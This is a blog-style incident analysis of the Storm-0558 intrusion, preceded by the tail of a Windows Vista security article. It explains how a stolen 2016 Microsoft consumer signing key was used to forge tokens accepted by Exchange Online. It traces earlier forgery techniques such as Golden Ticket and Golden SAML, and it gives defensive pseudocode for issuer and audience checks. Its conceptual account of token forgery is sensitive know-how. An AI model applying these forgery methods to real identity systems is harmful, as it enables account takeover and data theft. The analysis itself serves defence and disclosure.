The SKU limitation materially limited deployment reach for the era. No. KMCS foreclosed the dominant 2003-era unsigned-driver installation path catalogued in Hoglund and Butler [@s-hoglund-butler-rootkits] but did not address the signed-driver-with-vulnerability case. The "Bring Your Own Vulnerable Driver" afterlife became the dominant rootkit-loading path from approximately 2010 onward. Architectural closure waits for the Microsoft Vulnerable Driver Block list (Windows 10 and 11) -- post-era; Part 4 [@s-msft-driver-signing]. Windows ME and Windows 8 have competing claims. The honest framing is that Vista was one of the most poorly received Windows consumer releases of its era, and that the reception was uniquely consequential because the SP1-era enterprise inertia, the consumer-skipping that produced a large XP-to-7 leap, and the marketing problem Windows 7's launch had to solve all compounded each other. The substantive argument of this article -- that Vista's architecture was correct and Vista's integration was not, and that Windows 7 proved the integration tax is payable -- does not depend on the cross-history superlative.

Below the FAQ, a final pointer: this is Part 2 of six. Part 3 picks up the morning after Windows 7 GA with Stuxnet, Operation Aurora, the Enhanced Mitigation Experience Toolkit, and the process-mitigations era. The integrity-level stack Vista shipped in January 2007 is what every Part from here forward is built on top of.

Forged from 2016: How Storm-0558 Turned One Stolen Signing Key into U.S. Government Email Access

noreply@paragmali.com (Parag Mali) — Thu, 28 May 2026 00:00:00 GMT

**In summer 2023, a stolen Microsoft consumer signing key from 2016 was used to forge cryptographically valid tokens that read the email of U.S. Commerce Secretary Gina Raimondo, U.S. Ambassador to China Nicholas Burns, Congressman Don Bacon (R-NE), and approximately 60,000 messages from State Department accounts.** The cloud provider did not detect the breach -- the State Department did, on June 15, 2023, by spotting an unfamiliar `ClientAppID` in Microsoft 365 Purview audit logs. Three years on, Microsoft cannot publicly explain how the key was stolen. The Cyber Safety Review Board called the intrusion "preventable" and Microsoft's security culture "inadequate"; Microsoft's Secure Future Initiative now custodies signing keys in hardware security modules and Azure Confidential VMs and validates 90% of Entra ID tokens for Microsoft apps with a hardened SDK -- a four-for-four mapping to the four ways the pre-incident architecture failed at once.

1. A 2016 Key That Forged 2023 Government Email

On June 15, 2023, an analyst at the U.S. State Department's Security Operations Center was sifting through MailItemsAccessed events in Microsoft 365 Purview audit logs when something did not fit. A ClientAppID was reading mailboxes that did not match any application the State Department ran. The tokens that ClientAppID had presented to Exchange Online were cryptographically valid. They had been signed by a key Microsoft itself had published. Just not in 2023.

The certificate for that key was issued April 5, 2016. It had expired April 4, 2021 [@wiz-storm0558]. And per Microsoft's own admission to the Cyber Safety Review Board nine months later, nobody at Microsoft can publicly tell you how Storm-0558 got hold of it [@csrb-report-2024; @msrc-key-acquisition].

The State Department notified Microsoft on June 16, 2023 [@csrb-report-2024]. The Cybersecurity and Infrastructure Security Agency was looped in within days. On July 11, 2023, Microsoft published its first public mitigation post, attributing the campaign to a China-based actor it called Storm-0558 and reporting that approximately 25 organizations were affected [@msrc-storm0558-jul11]. Three days later, the Microsoft Threat Intelligence team published a longer technical analysis confirming the same actor had used "forged authentication tokens" beginning May 15, 2023 [@ms-security-jul14].

The Board finds that this intrusion was preventable and should never have occurred. The Board also concludes that Microsoft's security culture was inadequate and requires an overhaul. -- Cyber Safety Review Board, April 2, 2024 [@csrb-report-2024]

The plain English of what happened is this. Storm-0558 had stolen one private signing key. By the construction of Microsoft's identity infrastructure, that key was authoritative for the consumer-grade Microsoft Account (MSA) issuer -- the same issuer that signs tokens for @outlook.com, @live.com, Xbox accounts, and personal applications. The actor used the key to mint OpenID Connect access tokens that named enterprise mailboxes as their target. Those tokens should not have been accepted by Exchange Online, because Exchange Online is an enterprise resource and the signing key was a consumer issuer's. But they were accepted.

Once accepted, they granted read access to the named mailboxes. For six weeks, that access was active and uninterrupted. The Cyber Safety Review Board's final tally puts the harvest at approximately 60,000 emails from State Department accounts and a total of 22 enterprise organizations along with approximately 503 related personal accounts [@csrb-report-2024]. Identified individual victims include U.S. Commerce Secretary Gina Raimondo, U.S. Ambassador to China Nicholas Burns, and U.S. House of Representatives accounts that publicly include Congressman Don Bacon (R-NE) [@csrb-report-2024].

A class of attacks in which an adversary obtains an identity authority's private signing key and uses it to mint cryptographically valid credentials (tokens, tickets, or assertions) that no downstream defender can distinguish from those issued by the legitimate authority. MITRE catalogs the technique family as T1606, "Forge Web Credentials," with sub-techniques for web cookies (T1606.001) and SAML tokens (T1606.002) [@mitre-t1606; @mitre-t1606-002].

Four facts about this incident are what make it architecturally important, and each is a separate failure with its own remediation path. The first is that the stolen key was seven years old. It was issued in 2016 and had not been rotated since [@csrb-report-2024]. The second is that the validator on the enterprise side accepted a token signed by the wrong issuer for an enterprise resource. The third is that the cloud provider did not detect the breach -- a paying customer did, on routine threat-hunting against an audit log the customer had to pay extra to collect. The fourth, perhaps most uncomfortable, is that the cloud provider does not know how its own root signing secret was stolen.

Microsoft published a hypothesis in September 2023 (a crash dump exfiltrated through a compromised engineering account) [@msrc-key-acquisition], partially walked it back in March 2024 ("we have not found a crash dump containing the impacted key material") [@msrc-key-acquisition], and three weeks later the CSRB concluded definitively: Microsoft "has been unable to determine how or when Storm-0558 obtained the MSA key" [@csrb-report-2024].

The "Storm-0558" name is Microsoft's. Microsoft adopted a weather-themed taxonomy on April 18, 2023, in which Storm-NNNN denotes a developing actor pending attribution and family names like "Typhoon" indicate origin -- in this case, China [@ms-learn-actor-naming]. After attribution work matured, Microsoft renamed the group "Antique Typhoon" in August 2024 [@ms-security-jul14].

Each of those four facts is the closure of a separate architectural failure, and each is fixable in isolation. So how did all four fail at once? That answer begins with where the attack class came from, and why it had been written about for six years before it caught the State Department's attention.

2. The Lineage of Signing-Key Forgery

Storm-0558 is not a novel attack class. The primitive it instantiates -- steal an identity authority's signing secret, mint cryptographically valid tokens that no downstream defense can distinguish from legitimate ones -- has a six-year published lineage and an even longer informal one. The most important word in the previous sentence is "lineage." Each generation widened the trust domain the forgery primitive defeats.

Storm-0558 is the cloud-provider generalization of a technique whose first formal name dates to November 2017, when Shaked Reiner of CyberArk Labs published a CyberArk Threat Research post titled Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps [@reiner-golden-saml]. Reiner named the technique deliberately, riffing on Benjamin Delpy's earlier "Golden Ticket" name for the Kerberos analog.

Walking the lineage forward in order from oldest primitive to Storm-0558 is the cleanest way to see what is genuinely new in 2023.

timeline title Lineage of Identity-Authority Forgery 1997 : Pass-the-Hash : User credential reuse, host scope 2014 : Golden Ticket (Mimikatz) : krbtgt theft, AD forest scope 2017 : Golden SAML (Reiner / CyberArk) : AD FS Token-Signing key, federation scope 2020 : Sunburst SAML token forgery : Customer federations via supply chain 2023 : Storm-0558 : Cloud provider's own MSA signing key

Generation one is Pass-the-Hash, first published as working exploit code by Paul Ashton on NTBugtraq in April 1997 (a modified Samba SMB client whose orig_client.c diff is dated Tue Apr 8 17:27:29 1997) [@ashton-pth-1997] and described in Microsoft's own canonical whitepaper as the user-level baseline that all later generations replaced [@ms-pth-paper; @mitre-t1550-002]. The attacker captures the NTLM hash from a host they have already compromised and re-presents it to other Windows hosts. No password is recovered, no signing infrastructure is touched.The CIFS/SMB authentication exchange that PtH abuses passes the NTLM hash as a cryptographic proof of knowledge without ever needing the plaintext password -- which is why hashing the password did not reduce the attacker's working set. The blast radius is a single Windows host or, when paired with lateral movement, a constellation of hosts that share a credential. The trust authority being attacked is the user account, and the prerequisite is local code execution.

Generation two is Golden Ticket, attributed to Benjamin Delpy's mimikatz tool from approximately 2014 [@mitre-t1558-001; @mimikatz-kerberos; @crowdstrike-golden-ticket]. Where Pass-the-Hash forges user credentials, Golden Ticket forges Kerberos Ticket-Granting Tickets by signing them with the stolen krbtgt account's password hash from a domain controller. A forged TGT carries arbitrary PrivAttrCert SIDs, so the attacker can claim membership in any AD group, including Domain Admins. The blast radius widens from a host to an entire Active Directory forest. The trust authority being attacked is the forest's Key Distribution Center, and the prerequisite is extracting the krbtgt hash from a domain controller -- a one-time theft that, until krbtgt is rotated, lets the attacker mint TGTs indefinitely.

Generation three is Golden SAML, the technique Reiner named in 2017 [@reiner-golden-saml]. The vector is the same shape: steal the AD FS Token-Signing private key, forge SAML assertions, present them to any cloud Service Provider federated to that AD FS. Quoting Reiner verbatim, the technique "enables an attacker to create a golden SAML, which is basically a forged SAML 'authentication object,' and authenticate across every service that uses SAML 2.0 protocol as an SSO mechanism." The blast radius widens again: from a single forest to every cloud Service Provider configured to trust that customer's AD FS -- Azure, AWS, vSphere, and any SaaS in the customer's SSO catalog. CyberArk published a proof-of-concept tool, shimit, the same year [@shimit].

The naming lineage is deliberate. Delpy's "Golden Ticket" was an explicit reference to the visual of unlimited, never-expiring access; Reiner's "Golden SAML" was equally explicit homage to Delpy. Reiner notes the connection openly in the original CyberArk post: "the golden SAML name may remind you of another notorious attack known as golden ticket, which was introduced by Benjamin Delpy who is known for his famous attack tool called Mimikatz" [@reiner-golden-saml]. Storm-0558 is the unnamed fifth generation.

Generation four is Sunburst, December 2020. The Russian Foreign Intelligence Service (SVR) compromised the SolarWinds Orion build pipeline, planted a backdoor in Orion updates, and from that initial-access foothold used Golden SAML against the federations of victim organizations to mint forged SAML tokens for Microsoft 365 and other federated SaaS [@aa20-352a; @cyberark-golden-saml-revisited]. Microsoft itself was among the victims. The company's February 2021 final update acknowledged that SVR had accessed source code for "small subsets" of Azure, Intune, and Exchange components but found "no evidence of access to production services or customer data," and reported that the actor was not able to gain access to privileged credentials or apply the SAML forgery techniques against Microsoft's own corporate domains [@msrc-solorigate-final].

The blast radius pattern of Sunburst was: one supply-chain compromise on the way in, then Golden SAML in each federation once inside. CISA attributed the SAML-token forgery technique explicitly in AA20-352A and named the SVR as the responsible actor in an April 2021 update to the advisory [@aa20-352a].

A 2017 attack technique by which an adversary who possesses the AD FS Token-Signing private key forges SAML 2.0 assertions and authenticates as any user to any cloud Service Provider that federates with that AD FS. Cataloged by MITRE as T1606.002 ("Forge Web Credentials: SAML Tokens") and named by Shaked Reiner of CyberArk Labs in deliberate homage to Mimikatz's "Golden Ticket" [@mitre-t1606-002; @reiner-golden-saml].

Generation five -- the one this article is about -- is Storm-0558. The earlier four generations had one structural property in common: the trust authority being forged was the customer's identity infrastructure. The customer's NT account database, the customer's domain controller, the customer's AD FS Token-Signing certificate, the customer's Orion-installed SolarWinds environment that fed those things. Sunburst, when it reached Microsoft, attacked Microsoft as a customer of its own corporate AD FS infrastructure. Storm-0558 attacked something different: the cloud provider's own consumer identity-provider signing key. The trust authority being forged was Microsoft's MSA issuer -- the consumer-tier signing infrastructure that Microsoft itself operates as a service.

The blast radius of an attack of this shape is bounded only by where the relying-party validation libraries accept the cloud provider's issuer. In Storm-0558's case, as Wiz Research showed in independent analysis, the key could in principle have signed tokens accepted by Outlook.com, SharePoint, Teams, OneDrive, and any third-party multi-tenant application using Microsoft's converged v2.0 endpoint that accepts "Sign in with Microsoft" for personal accounts [@wiz-storm0558]. The publicly documented exploitation was scoped to Exchange Online and Outlook Web Access, but, as Wiz's authors put it, "the compromised signing key was more powerful than it may have seemed" [@wiz-storm0558].

So Storm-0558 is generation five in a chain whose earlier four generations had been documented, named, simulated, and operationalized for the better part of a decade. Sunburst still required compromising one customer's federation at a time. Storm-0558 compromised something different: Microsoft's own consumer identity provider. To understand how a consumer signing key could authenticate against an enterprise mailbox, we have to look at three architectural decisions Microsoft made between 2016 and 2022 -- and how they layered on top of an unrotated 2016 key.

3. The Architecture Before Storm-0558

Two parallel Microsoft identity providers operate under one corporate roof. The first is the consumer Microsoft Account (MSA) issuer, which signs tokens for @outlook.com, @live.com, Xbox accounts, and the personal-account flavor of "Sign in with Microsoft." The second is the enterprise Microsoft Entra ID issuer (formerly Azure AD), which signs tokens for @contoso.com-style workforce identities under a per-tenant issuer URL. Each issuer has its own signing keys and its own JWKS endpoint -- the public-key distribution endpoint that relying parties fetch to validate signatures.

These are separate systems with separate signing infrastructure, but the cross-tier distinction is finer than "different domains." Both the MSA and Entra ID issuers publish their v2.0 OpenID Connect tokens under the same login.microsoftonline.com host. What distinguishes them is the tenant GUID inside the issuer URL. The MSA "consumers" tenant has the well-known GUID 9188040d-6c67-4c5b-b112-36a304b66dad, so its v2.0 OIDC issuer is https://login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0 (verifiable live from the MSA OpenID Connect discovery document) [@msa-oidc-discovery]. Every Entra ID enterprise tenant has its own tenant GUID, so its issuer is https://login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0.

Microsoft's own July 11, 2023 disclosure put it plainly: "MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems. The actor exploited a token validation issue to impersonate Azure AD users and gain access to enterprise mail" [@msrc-storm0558-jul11]. The architectural sentence to hold on to from that paragraph is should only be valid for their respective systems. The next 1,500 words are an explanation of how that "should" became "did not."

A compact, URL-safe token format consisting of three Base64URL-encoded parts: a header (algorithm and key identifier), a payload (claims like `iss` (issuer), `sub` (subject), `aud` (audience), `exp` (expiration), `nbf` (not-before), and application-specific claims), and a signature over the header and payload. JSON Web Token Best Current Practices are codified in IETF RFC 8725 [@rfc-8725]. JWKS is the *JSON Web Key Set* a token issuer publishes at a well-known URL. Each key in the set carries a `kid` (Key ID). The JWT header names a `kid`, and the relying party uses it to locate the matching public key from the issuer's JWKS for signature verification. RFC 8725 requires a validator to restrict which signing algorithms it will accept (Section 3.1) and binds the `kid` lookup to a specific issuer's keys, never to a global key namespace [@rfc-8725].

To understand the cross-tier flaw, walk a standard JWT validation flow in order. Step one: the relying party parses the JWT header to read the alg and kid. Step two: it looks up the issuer's JWKS using the iss claim from the payload (or a hard-coded issuer URL it trusts). Step three: it locates the public key whose kid matches the one in the header. Step four: it verifies the signature using that key.

Step five is the one that matters. The validator checks the payload claims: iss must match the trusted issuer for this resource, aud must match this resource's identifier, exp and nbf must bracket the current time, and any application-specific tenant or scope claims must be enforced [@rfc-8725]. RFC 8725 (the IETF JWT Best Current Practices, published February 2020) makes step five mandatory; its Section 3.8 requires that "the application MUST validate that the cryptographic keys used for the cryptographic operations in the JWT belong to the issuer. If they do not, the application MUST reject the JWT." When step five does not happen, the entire validation reduces to "the signature is valid for some key the issuer signed something with," which is not the same as "the token authorizes the bearer for this resource."

flowchart LR A["JWT arrives at relying party"] --> B["Parse header: alg, kid"] B --> C["Fetch issuer JWKS by iss claim"] C --> D["Find key by kid"] D --> E["Verify signature with public key"] E --> F["Check iss, aud, tenant, scope, exp, nbf"] F --> G["Allow request"] F -.->|"omitted in OWA path before 2023"| G Microsoft Account is the consumer identity provider for `@outlook.com`, `@live.com`, Xbox, and personal-account "Sign in with Microsoft" flows. Its v2.0 OpenID Connect issuer is `https://login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0` -- the MSA "consumers" tenant on the shared `login.microsoftonline.com` host [@msa-oidc-discovery].

Microsoft Entra ID (formerly Azure Active Directory) is the enterprise identity provider for tenant-scoped workforce identities like user@contoso.com, with per-tenant issuers of the form https://login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0 on the same host. The cross-tier distinction is therefore tenant-GUID-vs-tenant-GUID inside the same v2.0 URL template, not domain-vs-domain. The two systems are operationally separate with separate signing keys, separate JWKS endpoints, and separate intended audiences [@msrc-storm0558-jul11; @msa-oidc-discovery].

Now bring in the three architectural decisions that lined up to create Storm-0558's window.

The first decision, in September 2018, was that Microsoft published a converged metadata endpoint. Microsoft's own September 6, 2023 retrospective is explicit about the motivation: "To meet growing customer demand to support applications which work with both consumer and enterprise applications, Microsoft introduced a common key metadata publishing endpoint in September 2018" [@msrc-key-acquisition].

The point of the converged endpoint was developer ergonomics. Build one app, use one validation library, accept users from @outlook.com and @contoso.com alike. Internally, the shared validation library would verify signatures against either issuer's keys, and was documented to expect that callers would add their own issuer and scope checks for resource-side authorization decisions.

The September 2018 decision was a developer-experience choice, not a security choice. Microsoft was responding to demand for unified consumer/enterprise app flows. The validation library it shipped could check iss, but the design left that decision to the caller -- under the (reasonable, at the time) assumption that each caller best understood which issuers should be acceptable for its resource. The flaw Storm-0558 exploited was not a bug in the library; it was a missing line in a caller five years later.

The second decision, in 2022, was that Microsoft's mail platform team migrated Outlook Web Access (OWA) and Exchange Online's token-validation code to consume that converged endpoint without adding the issuer and scope check the library expected callers to add.

The exact verbatim language from Microsoft's September 6, 2023 retrospective is worth quoting: "Developers in the mail system incorrectly assumed libraries performed complete validation and did not add the required issuer/scope validation. Thus, the mail system would accept a request for enterprise email using a security token signed with the consumer key" [@msrc-key-acquisition]. Two systems, both built by Microsoft, with a shared interface contract that was undocumented at the precise boundary that mattered.

The third precondition, which is not strictly a 2018-or-2022 decision but rather a non-decision running through both, is that the 2016 MSA consumer signing key had never been rotated. The CSRB report is direct about why: "Microsoft automated the key rotation process in the enterprise system with the intent for the consumer MSA system to follow and use the same technology, but it had not done so in the consumer MSA system before the intrusion" [@csrb-report-2024].

The MSA system had previously rotated keys manually. In 2021, the CSRB notes, Microsoft paused manual MSA rotation after a manual-rotation-related cloud outage, and the automated replacement never arrived. The 2016 key stayed live for seven years. Its certificate, per Wiz Research's recovery from public JWKS history, was issued April 5, 2016, and expired April 4, 2021 -- which means even after the certificate's nominal expiry, the underlying signing key was still accepted by the converged validator [@wiz-storm0558].

Key idea: By 2022, the four preconditions for Storm-0558 were all in place. (1) An unrotated 2016 MSA consumer signing key. (2) Software-resident key custody (no HSM) for that key. (3) A 2018 converged metadata endpoint whose validation library left issuer/scope enforcement to callers. (4) A 2022 mail-platform migration onto that endpoint with the issuer/scope check missing. All that was needed was the attacker holding the key.

These three (or four, counting the implicit software custody) factors did not align by accident. Each was an independent decision, made for an independent reason, by people working in good faith on different timelines. Developer ergonomics in 2018, mail-platform consolidation in 2022, a paused rotation process in 2021. None of them was a security decision. None of them was a vulnerability when shipped in isolation.

The 2018 library would happily check iss if the caller asked it to. The 2022 mail platform would happily reject a consumer-key-signed token if the integrator had added the check. The unrotated key would not have mattered if either of the validation layers had enforced separation. Storm-0558 required all four to be wrong at once. They were.

4. The Attack Chain, Step by Step

The attack itself happened in five operational stages. The forged-token activity began May 15, 2023 and continued until Microsoft invalidated the stolen key on June 24, 2023, after the State Department's notification on June 16 [@ms-security-jul14; @csrb-report-2024]. Forty-one days.

By the time the campaign was contained, Storm-0558 had been inside the cloud's identity infrastructure long enough to harvest tens of thousands of emails. What the attacker did is now mostly understood. What is not understood is how the attacker got the key in the first place.

sequenceDiagram participant Atk as Storm-0558 participant Key as 2016 MSA signing key participant MSA as MSA issuer infra participant OWA as OWA, Exchange Online participant Mbx as Target mailboxes Note over Atk,MSA: Mechanism unknown. Microsoft cannot determine how the key was obtained. MSA-->>Atk: 2016 MSA signing key, by May 2023 Atk->>Key: Forge OIDC JWT, kid for 2016 key Key->>OWA: Token signed by MSA issuer, claims target enterprise user OWA->>OWA: Verify signature, omit iss and aud check OWA->>Mbx: Authorize as enterprise user Mbx-->>Atk: MailItemsAccessed events, 60,000 emails over 6 weeks

4.1 Key acquisition (mechanism unknown)

What is known is that by May 15, 2023, Storm-0558 held a valid 2016 MSA signing key. What is unknown -- and this is the most important sentence in the entire article -- is how the actor obtained it.

Microsoft's September 6, 2023 retrospective offered a four-step hypothesis. A signing system crashed in April 2021. The crash generated a memory dump. The signing key was supposed to be redacted from such dumps, but a race condition allowed it through. The dump was supposed to remain inside an air-gapped production-isolated network but was migrated to the corporate debugging network. There, the credentials of a Microsoft engineer's account were compromised by an actor consistent with Storm-0558's tradecraft, and the dump was exfiltrated.

That was the September 2023 story.

Note: Microsoft updated its September 6, 2023 retrospective on March 12, 2024 to add the following: "The blog below states that the actor access may have resulted from a crash dump in 2021, but we have not found a crash dump containing the impacted key material" [@msrc-key-acquisition; @msrc-key-acquisition-archive]. The artifact (crash dump containing the key) was not found. The general shape of the hypothesis -- operational error plus compromised engineering account -- is retained as the leading hypothesis (see the immediately-following PullQuote for Microsoft's verbatim framing of what survives the retraction), not as a confirmed mechanism.

Three weeks after that retraction, the Cyber Safety Review Board published its report. The CSRB's finality on the question is uncompromising: Microsoft "has been unable to determine how or when Storm-0558 obtained the MSA key" [@csrb-report-2024]. The Board's investigation, which ran for seven months and drew on interviews with Microsoft engineers, the State Department, CISA, and independent reviewers, did not yield a confirmed mechanism. It identified candidate paths -- crash-dump migration, debugging-environment access, a compromised engineering account -- but found no artifact that closed any of them.

The epistemic shape of this finding deserves naming. Three years on, the cloud provider responsible for authenticating billions of users cannot publicly tell its customers how the most security-critical secret in its consumer identity stack was stolen.

That is not a minor footnote. As we will see in Section 7, it shapes Microsoft's entire architectural response: every Secure Future Initiative commitment about hardware-backed key custody, automatic rotation, and confidential signing has to defeat plausible mechanisms because the actual one cannot be enumerated.

Our leading hypothesis remains that operational errors resulted in key material leaving the secure token signing environment that was subsequently accessed in a debugging environment via a compromised engineering account. -- Microsoft Security Response Center, March 12, 2024 update to the September 6, 2023 Storm-0558 retrospective [@msrc-key-acquisition]

4.2 Token forgery

With the private key in hand, forging an OpenID Connect access token is mechanical. The header names the algorithm Microsoft uses (RS256, RSASSA-PKCS1-v1_5 with a SHA-256 hash, in this case) and the kid of the 2016 key. The payload claims identify the target user (sub), the target tenant where applicable, the requested audience (Exchange Online's resource URI), and validity timestamps.

The actor signs the header-and-payload with the stolen private key, Base64URL-encodes the three parts, and joins them with periods. The result is a valid JWT, indistinguishable from one Microsoft itself would mint. Why? Because the cryptographic verification any relying party performs is, by construction, "does this signature decrypt with the public key whose kid is named in the header?"

Storm-0558 forged tokens against both the legitimate MSA scope (Outlook.com mailboxes belonging to consumer accounts -- the intended use of the 2016 key) and the illegitimate cross-tier scope (enterprise Exchange Online mailboxes belonging to organizations like the U.S. State Department, which were never the intended audience for an MSA-signed token). The legitimacy of the signature did not change between the two. The difference was on the relying-party side.

4.3 The cross-tier validation flaw

This is the bug. The OWA and Exchange Online code path that received an incoming token, parsed the header, fetched the public key from the converged metadata endpoint, and verified the signature did not, after a successful signature verification, separately enforce that the token's iss claim matched an issuer authorized for enterprise email.

The shared validation library was perfectly capable of performing the issuer check, but only if asked. The OWA/Exchange Online caller did not ask.

A v2.0 MSA token's `iss` claim is `https://login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0` -- the MSA "consumers" tenant on the shared `login.microsoftonline.com` host, with the well-known consumers tenant GUID [@msa-oidc-discovery]. A v2.0 Entra ID token's `iss` claim is `https://login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0`, with the enterprise customer's own tenant GUID. The cross-tier distinction is tenant-GUID-vs-tenant-GUID *inside the same URL template*, not domain-vs-domain.

These are different issuers, with different signing keys and intended audiences. An enterprise resource like a State Department mailbox should accept only the second form, scoped to the State Department's tenant. Storm-0558's forged tokens presented the first form (the MSA "consumers" iss) for resources that should have accepted only the second. The validator did not notice the mismatch because it never read past the signature verification step.

The fix is one explicit iss/aud check on the relying-party side -- the joint mandate RFC 8725 Sections 3.8 and 3.9 have made mandatory since February 2020 (Section 3.8 covers iss and sub; Section 3.9 covers aud) [@rfc-8725; @rfc-8725-html].

The fix Microsoft eventually shipped is described in its own September 6, 2023 retrospective with the verbatim line "this issue has been corrected using the updated libraries" [@msrc-key-acquisition].

Wiz Research, looking at the same flaw from outside, framed the architectural consequence. The actor's compromised key "could have theoretically used the private key it acquired to forge tokens to authenticate as any user to any affected application that trusts Microsoft OpenID v2.0 mixed audience and personal-accounts certificates" [@wiz-storm0558]. The actual exploitation was scoped to email, but the addressable scope was larger.

The private key an identity provider uses to sign authentication tokens it issues. Whoever holds the signing key can mint tokens cryptographically indistinguishable from those issued by the legitimate provider. The security of the identity system, in the absence of independent issuer/scope/tenant validation on the relying-party side, depends entirely on the custody of this key. The CSRB report describes its compromise as the central enabler of Storm-0558 [@csrb-report-2024]. The check, performed by a JWT relying party after signature verification, that the token's `iss` claim matches a permitted issuer for the requested resource and the `aud` claim matches the resource's identifier. RFC 8725 codifies the combined obligation across two adjacent sub-sections: Section 3.8 ("Validate Issuer and Subject") makes `iss` and `sub` validation mandatory, and Section 3.9 ("Use and Validate Audience") makes `aud` validation mandatory [@rfc-8725; @rfc-8725-html]. Skipping either -- as the OWA/Exchange Online path did before mid-2023 -- collapses the security model to "any signature from any issuer the validator knows about is acceptable for any resource."

The function name GetAccessTokenForResource has been widely repeated across secondary coverage of Storm-0558 as the locus of the validation flaw. The name does not appear in any of the four primary sources: Microsoft's July 14, 2023 analysis, the September 6, 2023 retrospective, the CSRB report PDF, or the Wiz Research post. This article therefore describes the flaw functionally, as Microsoft itself did, without naming the function symbol [@msrc-key-acquisition; @csrb-report-2024; @wiz-storm0558].

The single missing check the OWA path needed to make -- and now does -- is mechanical. In pseudocode, the difference is exactly one if-statement:

{` // Pseudocode. Pre-2023 OWA path did the first two steps and skipped the third.

function verifyEnterpriseToken(jwt, tenantId, resource) { const header = parseJwtHeader(jwt); const payload = parseJwtPayload(jwt);

const issuerJwks = fetchJwks(payload.iss); const key = issuerJwks.find(k => k.kid === header.kid); if (!key) throw new Error('unknown kid');

if (!verifySignature(jwt, key)) throw new Error('bad signature');

// The missing steps. RFC 8725 Sections 3.8 and 3.9 require both. const allowedIssuer = 'https:' + '//login.microsoftonline.com/' + tenantId + '/v2.0'; if (payload.iss !== allowedIssuer) { throw new Error('issuer not authorized for this enterprise tenant'); } if (payload.aud !== resource) { throw new Error('audience does not match resource'); }

return payload; }

// Storm-0558's forged token carried payload.iss = 'https:' + '//login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0' // (the MSA consumers tenant). kid: a 2016 MSA key. Signature: valid. Issuer match: never checked. `}

4.4 Mailbox access and exfiltration

With validated tokens, the actor authenticated to Outlook Web Access and to Exchange Web Services as the target enterprise users. Once authenticated, the activity looked like any other authenticated user session: enumerate folders, fetch messages, read attachments.

Storm-0558 selected high-value targets. The CSRB final tally is, again, approximately 60,000 emails from State Department accounts; 22 enterprise organizations in total; approximately 503 related personal accounts [@csrb-report-2024]. Named individual victims publicly include U.S. Commerce Secretary Gina Raimondo, U.S. Ambassador to China Nicholas Burns, and U.S. House of Representatives accounts including Congressman Don Bacon (R-NE), who confirmed in August 2023 that the FBI had notified him his personal and campaign email accounts were among those compromised [@csrb-report-2024].

The campaign ran during what Microsoft characterized as China Standard Time business hours, with a working-hours heat-map pattern visible in the telemetry [@ms-security-jul14]. The duration was at least six weeks of active access: from the attacker's earliest documented activity on May 15, 2023 until Microsoft invalidated the stolen key on June 24, 2023, eight days after the State Department's June 16 notification.

4.5 The broader blast radius (potential, not exploited)

Wiz Research's independent analysis published in mid-2023 made an argument the world had not yet absorbed. The same 2016 MSA signing key could in principle have signed OpenID v2.0 tokens for many more Microsoft services than just email. The Wiz authors enumerated SharePoint, Teams, OneDrive, and any third-party multi-tenant application supporting "Sign in with Microsoft" with mixed-audience personal-account acceptance [@wiz-storm0558].

The framing they wrote -- "if a signing key for Google, Facebook, Okta or any other major identity provider leaks, the implications are hard to comprehend" -- is the right framing [@wiz-storm0558].

There is no public evidence that Storm-0558 exploited the broader scope. The breach the world saw is the breach Microsoft and CISA found by enumerating one specific service's logs. Whether the broader scope was exploited and not detected is, as we will note in Section 10, an unanswered question.

Six weeks of access. Approximately 60,000 State Department emails. The cloud provider did not notice. So who did notice, and how?

5. Why a Paying Customer, Not Microsoft, Caught It

On June 15, 2023, the State Department SOC analyst who first noticed Storm-0558 was performing routine threat-hunting against Microsoft 365 Purview audit logs. The specific event type that surfaced the anomaly was MailItemsAccessed, an audit record that fires whenever a mailbox item is read or fetched. It captures who read it (UserId), from where (ClientIPAddress), with what application (ClientAppID, AppID), and against which item (InternetMessageId and folder).

The detection technique was a baseline-deviation check. The State Department maintained a list of legitimate (ClientAppID, AppID) pairs that historically read mailboxes belonging to its employees. Storm-0558's forged-token sessions presented AppID values that were not on the list.

Two days later, CISA and the FBI published joint advisory AA23-193A formalizing what the State Department had done into a recommended detection methodology. The verbatim language in the advisory: "In Mid-June 2023, an FCEB agency observed MailItemsAccessed events with an unexpected ClientAppID and AppID in M365 Audit Logs. ... The affected FCEB agency identified suspicious activity by leveraging enhanced logging -- specifically of MailItemsAccessed events -- and an established baseline of normal Outlook activity (e.g., expected AppID). The MailItemsAccessed event enables detection of otherwise difficult to detect adversarial activity" [@aa23-193a; @aa23-193a-pdf].

A Microsoft 365 audit event that records every read or fetch operation against a mailbox item. The event captures the user, source IP, client and application IDs, and the message identifier accessed. Because forged-token sessions necessarily use an `AppID` outside an organization's normal application inventory, `MailItemsAccessed` is the highest-signal event class for detecting mailbox-token abuse [@aa23-193a]. A Microsoft 365 audit-log tier that, pre-July 2023, gated several high-value security event classes (including `MailItemsAccessed`) behind a paid add-on. Most federal civilian agencies and many commercial tenants were on Purview Audit (Standard) and did not collect these events. The State Department had paid for Premium and was therefore in a position to detect Storm-0558 from its own telemetry [@aa23-193a; @ms-blog-jul19-recovered]. flowchart TD A["June 15, 2023: State Department SOC analyst
notices unfamiliar ClientAppID in MailItemsAccessed events"] --> B["June 16, 2023: State Department notifies Microsoft"] B --> C["Microsoft compares kid against published MSA
key rotation history, identifies 2016 key"] C --> D["July 11, 2023: Microsoft public disclosure post"] D --> E["July 12, 2023: CISA and FBI publish AA23-193A"] E --> F["July 19, 2023: Microsoft expands free Purview Audit features"] E --> G["July 27, 2023: Wyden letter to DOJ, FTC, CISA"] G --> H["August 11, 2023: DHS announces CSRB cloud review"]

Microsoft's confirmation step came after the State Department's notification, not before. Once notified, Microsoft compared the kid on the suspicious tokens against its own published MSA key rotation history and found that the kid corresponded to a 2016 key whose certificate had expired April 4, 2021 [@wiz-storm0558; @ms-security-jul14]. The signature was cryptographically valid for the 2016 key. The 2016 key should never have signed an enterprise-tier token. Both halves of that statement were true at the same time, and the second half is what told Microsoft this was a key compromise rather than a stolen-credential issue.

